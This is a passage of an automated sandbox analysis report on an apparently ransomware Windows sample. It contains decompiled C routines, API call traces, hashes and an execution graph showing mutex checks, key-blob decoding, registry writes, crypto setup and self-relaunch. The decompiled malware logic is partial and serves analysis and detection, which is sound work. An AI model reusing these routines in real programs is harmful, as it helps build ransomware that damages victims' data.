                                        			Instruction addresses (one entry per decompiled line above): 0x0f9d33e3, 0x0f9d33e5, 0x0f9d33e9, 0x0f9d33eb, 0x0f9d33ee, 0x0f9d33f1, 0x0f9d33f8, 0x0f9d34db, 0x0f9d34db, 0x0f9d3410, 0x0f9d3425, 0x0f9d342b, 0x0f9d342f, 0x00000000, 0x0f9d3431, 0x0f9d3432, 0x0f9d3434, 0x0f9d343a, 0x0f9d3441, 0x0f9d3444, 0x0f9d344a, 0x0f9d344b, 0x0f9d34ba, 0x0f9d344d, 0x0f9d344e, 0x0f9d3450, 0x0f9d3452, 0x0f9d3456, 0x0f9d3467, 0x0f9d3467, 0x0f9d346b, 0x0f9d346d, 0x0f9d3471, 0x0f9d3473, 0x0f9d3478, 0x0f9d347c, 0x00000000, 0x00000000, 0x0f9d347e, 0x00000000, 0x0f9d347c, 0x0f9d3480, 0x0f9d3480, 0x0f9d3483, 0x0f9d3484, 0x0f9d3495, 0x0f9d349e, 0x0f9d34a3, 0x0f9d34a7, 0x0f9d34a7, 0x0f9d34ad, 0x0f9d34b0, 0x0f9d34b0, 0x00000000, 0x0f9d3458, 0x0f9d345c, 0x0f9d345f, 0x00000000, 0x0f9d3461, 0x0f9d3461, 0x0f9d3465, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0f9d3465, 0x00000000, 0x0f9d345f, 0x0f9d3458, 0x0f9d3456, 0x0f9d344e, 0x0f9d344b, 0x0f9d3444, 0x0f9d34bf, 0x0f9d34bf, 0x0f9d34bf, 0x0f9d34c2, 0x0f9d34c3, 0x0f9d34d6, 0x0f9d34d6, 0x0f9d3412, 0x0f9d3412, 0x0f9d3418, 0x0f9d3422, 0x0f9d3422

                                        APIs
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,00000000,?,0F9D52F0,?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32C5
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32EE
                                        • lstrlenA.KERNEL32(0F9D52F1,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3484
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D52F0,00000000), ref: 0F9D348E
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D52F0,00000000), ref: 0F9D3495
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F1,?,0F9D52F0,00000000), ref: 0F9D34A7
                                        • ExitProcess.KERNEL32 ref: 0F9D34DB
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                        • String ID:
                                        • API String ID: 1867342102-0
                                        • Opcode ID: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction ID: 2eadb3a7e336fa3221ecfededf03f1dda319bd8864a1b048a5c50baba3533d3b
                                        • Opcode Fuzzy Hash: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction Fuzzy Hash: F33105315082455AEB320F689844FF57B6C9F82352FB8C189F885CB2C3D62D688687A3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 0F9D3B72
                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion_memset
                                        • String ID:
                                        • API String ID: 3299124433-0
                                        • Opcode ID: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction ID: b908308a20444b2cbfb41d379da8936264d4ba24b459d59ea5ff71969377bbf9
                                        • Opcode Fuzzy Hash: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction Fuzzy Hash: C9111BB0D4031C6EEB609F64DC0ABEA7ABCEB09704F008199A648E61C1D6B94B948FD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D4CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                        				CHAR* _v8;
                                        				char _v12;
                                        				char _v20;
                                        				char _t16;
                                        				char _t20;
                                        				char _t21;
                                        				intOrPtr* _t24;
                                        				intOrPtr _t25;
                                        				intOrPtr _t26;
                                        				intOrPtr* _t29;
                                        				CHAR* _t33;
                                        				intOrPtr _t34;
                                        				intOrPtr _t35;
                                        				void* _t38;
                                        				void* _t41;
                                        				intOrPtr* _t42;
                                        				void* _t47;
                                        				void* _t49;
                                        				intOrPtr* _t51;
                                        				CHAR* _t53;
                                        
                                        				asm("movq xmm0, [0xf9dfa84]");
                                        				_t16 =  *0xf9dfa8c; // 0x0
                                        				_t29 = _a4;
                                        				_v8 = __edx;
                                        				_t51 = __ecx;
                                        				asm("movq [ebp-0x10], xmm0");
                                        				_v12 = _t16;
                                        				if( *_t29 == 0) {
                                        					L11:
                                        					if(_t51 == 0) {
                                        						goto L10;
                                        					} else {
                                        						if(_v20 == 0) {
                                        							L22:
                                        							if(_t51 == 0) {
                                        								goto L10;
                                        							} else {
                                        								_t53 = _t51 + lstrlenA( &_v20);
                                        								while(1) {
                                        									_t20 =  *_t53;
                                        									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                        										break;
                                        									}
                                        									_t53 =  &(_t53[1]);
                                        								}
                                        								_t33 = _t53;
                                        								while(1) {
                                        									_t21 =  *_t33;
                                        									if(_t21 < 0x30 || _t21 > 0x39) {
                                        										goto L30;
                                        									}
                                        									L31:
                                        									_t33 =  &(_t33[1]);
                                        									continue;
                                        									L30:
                                        									if(_t21 == 0x2e) {
                                        										goto L31;
                                        									}
                                        									 *_t33 = 0;
                                        									return lstrcpyA(_v8, _t53);
                                        									goto L33;
                                        								}
                                        							}
                                        						} else {
                                        							_t34 =  *_t51;
                                        							if(_t34 != 0) {
                                        								_t47 = _t51 -  &_v20;
                                        								do {
                                        									_t24 =  &_v20;
                                        									if(_t34 == 0) {
                                        										L19:
                                        										if( *_t24 == 0) {
                                        											goto L22;
                                        										} else {
                                        											goto L20;
                                        										}
                                        									} else {
                                        										while(1) {
                                        											_t35 =  *_t24;
                                        											if(_t35 == 0) {
                                        												goto L22;
                                        											}
                                        											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                        											if(_t41 != 0) {
                                        												goto L19;
                                        											} else {
                                        												_t24 = _t24 + 1;
                                        												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                        													continue;
                                        												} else {
                                        													goto L19;
                                        												}
                                        											}
                                        											goto L33;
                                        										}
                                        										goto L22;
                                        									}
                                        									goto L33;
                                        									L20:
                                        									_t34 =  *((intOrPtr*)(_t51 + 1));
                                        									_t51 = _t51 + 1;
                                        									_t47 = _t47 + 1;
                                        								} while (_t34 != 0);
                                        							}
                                        							goto L10;
                                        						}
                                        					}
                                        				} else {
                                        					_t25 =  *__ecx;
                                        					if(_t25 == 0) {
                                        						L10:
                                        						return lstrcpyA(_v8, "fabian wosar <3");
                                        					} else {
                                        						_t49 = __ecx - _t29;
                                        						do {
                                        							_t42 = _t29;
                                        							if(_t25 == 0) {
                                        								L8:
                                        								if( *_t42 == 0) {
                                        									goto L11;
                                        								} else {
                                        									goto L9;
                                        								}
                                        							} else {
                                        								while(1) {
                                        									_t26 =  *_t42;
                                        									if(_t26 == 0) {
                                        										goto L11;
                                        									}
                                        									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                        									if(_t38 != 0) {
                                        										goto L8;
                                        									} else {
                                        										_t42 = _t42 + 1;
                                        										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                        											continue;
                                        										} else {
                                        											goto L8;
                                        										}
                                        									}
                                        									goto L33;
                                        								}
                                        								goto L11;
                                        							}
                                        							goto L33;
                                        							L9:
                                        							_t25 =  *((intOrPtr*)(_t51 + 1));
                                        							_t51 = _t51 + 1;
                                        							_t49 = _t49 + 1;
                                        						} while (_t25 != 0);
                                        						goto L10;
                                        					}
                                        				}
                                        				L33:
                                        			}

                                        APIs
                                        • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F9D5034), ref: 0F9D4D3D
                                        • lstrlenA.KERNEL32(00000000,?,0F9D5034), ref: 0F9D4D97
                                        • lstrcpyA.KERNEL32(?,?,?,0F9D5034), ref: 0F9D4DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID: fabian wosar <3
                                        • API String ID: 367037083-1724090804
                                        • Opcode ID: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction ID: 673b918679bf427c4e54f02d159f0e369767471d9fc70112bb3fadab08324379
                                        • Opcode Fuzzy Hash: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction Fuzzy Hash: 6C3105258082A94BDB32CE7C54643FABFA9AF47201FB8D589E8C55B287D231744EC790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			#include <windows.h>
                                        			
                                        			/* Scans a "name=value}" token: cuts the name at the first '=',
                                        			   classifies it (1 = "mask", 2 = "pub_key", 0 = anything else),
                                        			   then restores the '='. The comparison operands that the
                                        			   decompiler dropped are reconstructed from the two lstrcmpiA
                                        			   calls at 0F9D31B9 and 0F9D31D1. */
                                        			int E0F9D3190(CHAR* _a4) {
                                        				char _t6;
                                        				CHAR* _t13;
                                        				CHAR* _t16;
                                        				int _t10;
                                        				int _t11;
                                        
                                        				_t13 = _a4;
                                        				_t16 = _t13;
                                        				if( *_t13 == 0) {
                                        					goto L5;
                                        				}
                                        				while(1) {
                                        					_t6 =  *_t16;
                                        					if(_t6 == 0x7d) {        /* '}' reached before any '=': no key */
                                        						return 0;
                                        					}
                                        					if(_t6 == 0x3d) {        /* '=': terminate the key name here */
                                        						 *_t16 = 0;
                                        						goto L5;
                                        					}
                                        					_t16 =  &(_t16[1]);
                                        					if( *_t16 == 0) {        /* end of string without '=' or '}' */
                                        						goto L5;
                                        					}
                                        				}
                                        				L5:
                                        				_t10 = (lstrcmpiA(_t13, "mask") == 0) ? 1 : 0;
                                        				_t11 = (lstrcmpiA(_a4, "pub_key") == 0) ? 2 : _t10;
                                        				 *_t16 = 0x3d;               /* put the '=' (or terminator) back */
                                        				return _t11;
                                        			}

                                        APIs
                                        • lstrcmpiA.KERNEL32(0F9D52F0,mask,0F9D52F1,?,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31B9
                                        • lstrcmpiA.KERNEL32(0F9D52F0,pub_key,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi
                                        • String ID: mask$pub_key
                                        • API String ID: 1586166983-1355590148
                                        • Opcode ID: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction ID: e71e890305bd38e5069b66116b8f61ade97e9b1cfc5e01979753ba9f99c97e9f
                                        • Opcode Fuzzy Hash: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction Fuzzy Hash: 33F046723082861EF7354E68DC45BA1BBCC9B42312FB4847EF78AC21C2C2AA9881C351
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:5.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:700
                                        Total number of Limit Nodes:10
2090->2084 2092 f9d53f9 CreateFileMappingW 2091->2092 2093 f9d5487 VirtualFree 2091->2093 2094 f9d5411 MapViewOfFile 2092->2094 2095 f9d5480 CloseHandle 2092->2095 2093->2074 2096 f9d5477 CloseHandle 2094->2096 2097 f9d5427 lstrlenW lstrlenA 2094->2097 2095->2093 2096->2095 2098 f9d5468 UnmapViewOfFile 2097->2098 2099 f9d5444 lstrlenA 2097->2099 2098->2096 2099->2098 2102 f9d5246 CryptStringToBinaryA 2101->2102 2104 f9d526c _memset 2102->2104 2105 f9d5385 GetLastError 2102->2105 2107 f9d52b0 lstrlenA 2104->2107 2106 f9d536c VirtualFree 2105->2106 2106->2081 2108 f9d52ce 2107->2108 2151 f9d33e0 2108->2151 2111 f9d538d 2161 f9d5190 VirtualAlloc VirtualAlloc 2111->2161 2112 f9d52fa 2114 f9d531c lstrlenA VirtualAlloc 2112->2114 2118 f9d5341 2112->2118 2116 f9d5339 lstrcpyA 2114->2116 2114->2118 2116->2118 2117 f9d535d 2119 f9d5369 2117->2119 2121 f9d5366 HeapFree 2117->2121 2118->2117 2120 f9d5355 HeapFree 2118->2120 2119->2106 2120->2117 2121->2119 2123 f9d4fbd SetHandleInformation 2122->2123 2124 f9d4fb3 2122->2124 2123->2124 2125 f9d4fd3 CreatePipe SetHandleInformation 2123->2125 2124->2088 2125->2124 2126 f9d4ffc VirtualAlloc 2125->2126 2127 f9d504b lstrcpyA 2126->2127 2128 f9d5016 wsprintfW 2126->2128 2127->2088 2133 f9d4c40 2128->2133 2130 f9d502b 2138 f9d4de0 2130->2138 2134 f9d9010 _memset 2133->2134 2135 f9d4c5e CreateProcessW 2134->2135 2136 f9d4ca9 GetLastError 2135->2136 2137 f9d4cb4 CloseHandle CloseHandle 2135->2137 2136->2130 2137->2130 2143 f9d4ded 2138->2143 2139 f9d4df6 ReadFile 2140 f9d4e65 2139->2140 2139->2143 2141 f9d4e83 VirtualFree 2140->2141 2144 f9d4cd0 2140->2144 2141->2088 2143->2139 2143->2140 2147 f9d4cfb 2144->2147 2145 f9d4d35 lstrcpyA 2145->2141 2146 f9d4d93 lstrlenA 2149 f9d4da0 lstrcpyA 2146->2149 2147->2145 2147->2146 2148 f9d4d8d 2147->2148 2148->2145 2149->2141 2165 f9d32b0 lstrlenA 2151->2165 2154 f9d34d9 ExitProcess 2156 f9d3412 2156->2111 2156->2112 2158 f9d3483 lstrlenA GetProcessHeap HeapAlloc 2159 f9d3407 2158->2159 2160 
f9d34a5 lstrcpyA 2158->2160 2159->2156 2159->2158 2169 f9d3190 2159->2169 2173 f9d3200 2159->2173 2160->2159 2162 f9d51f9 ExitProcess 2161->2162 2163 f9d51c0 GetModuleFileNameW 2161->2163 2163->2162 2164 f9d51d2 wsprintfW ShellExecuteW 2163->2164 2164->2162 2166 f9d32cf 2165->2166 2167 f9d32f8 2165->2167 2168 f9d32d0 lstrlenA 2166->2168 2167->2154 2167->2159 2168->2167 2168->2168 2170 f9d319e 2169->2170 2171 f9d31b0 lstrcmpiA lstrcmpiA 2169->2171 2170->2171 2172 f9d31f1 2170->2172 2171->2159 2172->2159 2174 f9d3210 2173->2174 2175 f9d323d 2174->2175 2176 f9d326d 2174->2176 2177 f9d3250 lstrlenA GetProcessHeap HeapAlloc 2174->2177 2175->2159 2179 f9d3299 2176->2179 2180 f9d3272 lstrlenA GetProcessHeap HeapAlloc 2176->2180 2178 f9d328d 2177->2178 2178->2179 2181 f9d3291 lstrcpyA 2178->2181 2179->2159 2180->2178 2181->2179 2182->1844 2184 f9d569c wsprintfW 2183->2184 2209 f9d39f0 GetProcessHeap 2184->2209 2187 f9d56ef 2188 f9d7330 98 API calls 2187->2188 2189 f9d56fa 2188->2189 2190 f9d7140 16 API calls 2189->2190 2191 f9d5705 lstrlenW 2190->2191 2192 f9d6f40 49 API calls 2191->2192 2193 f9d571d lstrlenW 2192->2193 2194 f9d9010 _memset 2193->2194 2195 f9d5766 lstrlenA 2194->2195 2196 f9d5782 2195->2196 2197 f9d5797 CryptBinaryToStringA 2196->2197 2198 f9d57bc GetLastError 2197->2198 2199 f9d57c2 lstrlenA VirtualAlloc lstrlenA 2197->2199 2198->2199 2200 f9d57ee lstrlenA 2199->2200 2202 f9d5822 2200->2202 2206 f9d5805 lstrlenA 2200->2206 2203 f9d54a0 97 API calls 2202->2203 2205 f9d582e VirtualFree 2203->2205 2207 f9d7c10 10 API calls 2205->2207 2206->2202 2208 f9d585d VirtualFree 2207->2208 2208->1852 2209->2187 2223 f9d2d10 SendMessageW ExitThread 2224 f9d2d30 2245 f9d2f50 EnumDeviceDrivers 2224->2245 2226 f9d2d8c 2227 f9d2de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2226->2227 2230 f9d2f50 7 API calls 2226->2230 2228 f9d2e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2227->2228 2229 f9d2e75 ExitThread 2227->2229 2231 f9d2ebe 
ExitThread 2228->2231 2232 f9d2ec5 ShowWindow UpdateWindow CreateThread 2228->2232 2233 f9d2d99 2230->2233 2234 f9d2eed CloseHandle 2232->2234 2235 f9d2ef4 GetMessageW 2232->2235 2233->2227 2238 f9d2f50 7 API calls 2233->2238 2234->2235 2236 f9d2f3d ExitThread 2235->2236 2237 f9d2f0b 2235->2237 2239 f9d2f17 TranslateMessage DispatchMessageW 2237->2239 2240 f9d2dce 2238->2240 2239->2236 2241 f9d2f2c GetMessageW 2239->2241 2240->2236 2255 f9d30a0 2240->2255 2241->2236 2241->2239 2246 f9d2f7d 2245->2246 2247 f9d2f82 VirtualAlloc 2245->2247 2246->2226 2248 f9d2f9f EnumDeviceDrivers 2247->2248 2249 f9d2f99 2247->2249 2250 f9d2fae 2248->2250 2251 f9d2ff2 VirtualFree 2248->2251 2249->2226 2250->2251 2252 f9d2fc0 GetDeviceDriverBaseNameW 2250->2252 2251->2226 2252->2250 2253 f9d2fd9 lstrcmpiW 2252->2253 2253->2250 2254 f9d3009 VirtualFree 2253->2254 2254->2226 2256 f9d2f50 7 API calls 2255->2256 2257 f9d3151 2256->2257 2258 f9d2f50 7 API calls 2257->2258 2263 f9d2ddb 2257->2263 2259 f9d3160 2258->2259 2260 f9d2f50 7 API calls 2259->2260 2259->2263 2261 f9d316c 2260->2261 2262 f9d2f50 7 API calls 2261->2262 2261->2263 2262->2263 2263->2236 2264 f9d2ad0 VirtualAlloc 2263->2264 2265 f9d2b02 GetModuleFileNameW GetTempPathW 2264->2265 2267 f9d2b48 2265->2267 2268 f9d2b4c 2267->2268 2269 f9d2b53 lstrlenW 2267->2269 2307 f9d2960 lstrlenW 2268->2307 2279 f9d8150 CryptAcquireContextW 2269->2279 2271 f9d2b8e GetEnvironmentVariableW 2273 f9d2bac 2271->2273 2275 f9d2bd8 lstrcatW lstrcatW lstrcatW 2273->2275 2278 f9d2bb0 2273->2278 2274 f9d2c45 ExitThread 2290 f9d2890 CreateFileW 2275->2290 2277 f9d2c2f wsprintfW 2277->2268 2278->2274 2278->2277 2280 f9d8269 2279->2280 2281 f9d817b 2279->2281 2280->2271 2281->2281 2282 f9d818e VirtualAlloc 2281->2282 2283 f9d81ab 2282->2283 2284 f9d8272 CryptReleaseContext VirtualFree 2282->2284 2283->2284 2285 f9d81b3 GetModuleHandleA 2283->2285 2284->2271 2286 f9d81f9 LoadLibraryA 2285->2286 2287 f9d8207 GetProcAddress 2285->2287 2286->2287 2289 
f9d8216 CryptReleaseContext VirtualFree 2286->2289 2287->2289 2289->2280 2291 f9d28f9 2290->2291 2292 f9d28b8 GetFileSize 2290->2292 2291->2278 2312 f9d3030 2292->2312 2295 f9d3030 7 API calls 2296 f9d28d5 CreateFileMappingW 2295->2296 2297 f9d2902 MapViewOfFile 2296->2297 2298 f9d28f2 CloseHandle 2296->2298 2299 f9d2948 CloseHandle CloseHandle 2297->2299 2300 f9d2916 2297->2300 2298->2291 2299->2278 2301 f9d3030 7 API calls 2300->2301 2302 f9d291b 2301->2302 2303 f9d292b 2302->2303 2317 f9d82a0 CryptAcquireContextW 2302->2317 2328 f9d2830 CreateFileW 2303->2328 2308 f9d8150 9 API calls 2307->2308 2309 f9d29ad RegCreateKeyExW 2308->2309 2310 f9d2a8e lstrlenW RegSetValueExW RegCloseKey 2309->2310 2311 f9d2ac0 2309->2311 2310->2274 2311->2274 2313 f9d2f50 7 API calls 2312->2313 2314 f9d307f 2313->2314 2315 f9d2f50 7 API calls 2314->2315 2316 f9d28c8 2314->2316 2315->2316 2316->2295 2318 f9d82ce VirtualAlloc 2317->2318 2319 f9d8392 2317->2319 2321 f9d82f8 2318->2321 2322 f9d839b CryptReleaseContext VirtualFree 2318->2322 2319->2303 2321->2322 2323 f9d8301 GetModuleHandleA 2321->2323 2322->2303 2324 f9d8355 GetProcAddress 2323->2324 2325 f9d8347 LoadLibraryA 2323->2325 2326 f9d8379 CryptReleaseContext VirtualFree 2324->2326 2327 f9d8364 2324->2327 2325->2324 2325->2326 2326->2319 2327->2326 2329 f9d287f UnmapViewOfFile 2328->2329 2330 f9d285b 2328->2330 2329->2299 2331 f9d285f WriteFile 2330->2331 2332 f9d2873 2330->2332 2331->2332 2333 f9d2878 CloseHandle 2331->2333 2332->2333 2333->2329 2334 f9d2c50 2335 f9d2c7b 2334->2335 2336 f9d2cda CreateThread DestroyWindow 2334->2336 2337 f9d2c97 BeginPaint lstrlenW TextOutW EndPaint 2335->2337 2338 f9d2c80 DefWindowProcW 2335->2338 2482 f9d90a0 IsProcessorFeaturePresent 2483 f9d90c6 2482->2483 2484 f9d5ec0 2485 f9d5ee2 2484->2485 2486 f9d5f0e GetPEB 2485->2486 2487 f9d5f28 2486->2487 2488 f9d6de0 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2489 f9d6c90 111 API calls 2488->2489 2490 f9d6e70 VirtualFree 
ExitThread 2489->2490

                                        Callgraph


                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4950() {
                                        				void* _v8;
                                        				void* _v12;
                                        				CHAR* _v16;
                                        				int _v20;
                                        				void* _v24;
                                        				int _v28;
                                        				void* _v32;
                                        				int _v36;
                                        				int _v40;
                                        				int _v44;
                                        				int _v48;
                                        				int _v52;
                                        				int _v60;
                                        				char _v80;
                                        				void* _t54;
                                        				int _t79;
                                        				void* _t81;
                                        				short* _t97;
                                        				void* _t114;
                                        
                                        				Sleep(0x3e8); // executed
                                        				_t54 = E0F9D4600(_t90, _t106); // executed
                                        				if(_t54 == 0) {
                                        					_v8 = CreateThread(0, 0, E0F9D2D30, 0, 0, 0);
                                        					if(_v8 != 0) {
                                        						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                        							_t90 = _v8;
                                        							TerminateThread(_v8, 0);
                                        						}
                                        						_t106 = _v8;
                                        						CloseHandle(_v8);
                                        					}
                                        					E0F9D46F0();
                                        					E0F9D40E0(_t90, _t106);
                                        					E0F9D6420( &_v80);
                                        					_v40 = 0;
                                        					_v36 = 0;
                                        					_v28 = 0;
                                        					_v44 = 0;
                                        					E0F9D63D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
                                        					_v48 = 0;
                                        					_v16 = 0;
                                        					if(E0F9D4930(_v28) == 0) {
                                        						while(_v48 == 0) {
                                        							_t81 = E0F9D5880(_v28, _v44, _v40, _v36,  &_v16);
                                        							_t114 = _t114 + 0xc;
                                        							if(_t81 != 0) {
                                        								_v48 = 1;
                                        							} else {
                                        								Sleep(0x2710);
                                        							}
                                        						}
                                        						E0F9D6390( &_v80);
                                        						_v32 = 0;
                                        						_v20 = 0;
                                        						_v52 = 0;
                                        						_v60 = 0;
                                        						__eflags = _v16;
                                        						if(_v16 == 0) {
                                        							L19:
                                        							E0F9D4030();
                                        							InitializeCriticalSection(0xf9e2a48);
                                        							__eflags = _v52;
                                        							if(__eflags == 0) {
                                        								E0F9D3E20( &_v80);
                                        							} else {
                                        								E0F9D4000(_v32, _v20, __eflags);
                                        							}
                                        							DeleteCriticalSection(0xf9e2a48);
                                        							__eflags = E0F9D3AA0();
                                        							if(__eflags != 0) {
                                        								E0F9D43E0(__eflags);
                                        							}
                                        							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                        							__eflags = _v24;
                                        							if(__eflags != 0) {
                                        								GetModuleFileNameW(0, _v24, 0x100);
                                        								E0F9D3BE0(_v24, _v24, __eflags);
                                        								VirtualFree(_v24, 0, 0x8000);
                                        							}
                                        							__eflags =  *0xf9e2a44;
                                        							if( *0xf9e2a44 != 0) {
                                        								_t97 =  *0xf9e2a44; // 0x60000
                                        								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
                                        							}
                                        							ExitThread(0);
                                        						}
                                        						_v20 = lstrlenA(_v16);
                                        						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
                                        						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
                                        						__eflags = _t79;
                                        						if(_t79 != 0) {
                                        							_v52 = 1;
                                        							goto L19;
                                        						}
                                        						ExitProcess(0);
                                        					} else {
                                        						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                        						_t119 = _v12;
                                        						if(_v12 != 0) {
                                        							GetModuleFileNameW(0, _v12, 0x100);
                                        							E0F9D3BE0(_v12,  &_v44, _t119);
                                        							VirtualFree(_v12, 0, 0x8000);
                                        						}
                                        						ExitProcess(0);
                                        					}
                                        				}
                                        				ExitProcess(0); // executed
                                        			}

                                        APIs
                                        • Sleep.KERNELBASE(000003E8), ref: 0F9D495B
                                          • Part of subcall function 0F9D4600: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                          • Part of subcall function 0F9D4600: lstrcpyW.KERNEL32 ref: 0F9D467F
                                          • Part of subcall function 0F9D4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                          • Part of subcall function 0F9D4600: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                          • Part of subcall function 0F9D4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                          • Part of subcall function 0F9D4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        • ExitProcess.KERNEL32 ref: 0F9D496C
                                        • CreateThread.KERNEL32 ref: 0F9D4981
                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F9D4999
                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0F9D49AC
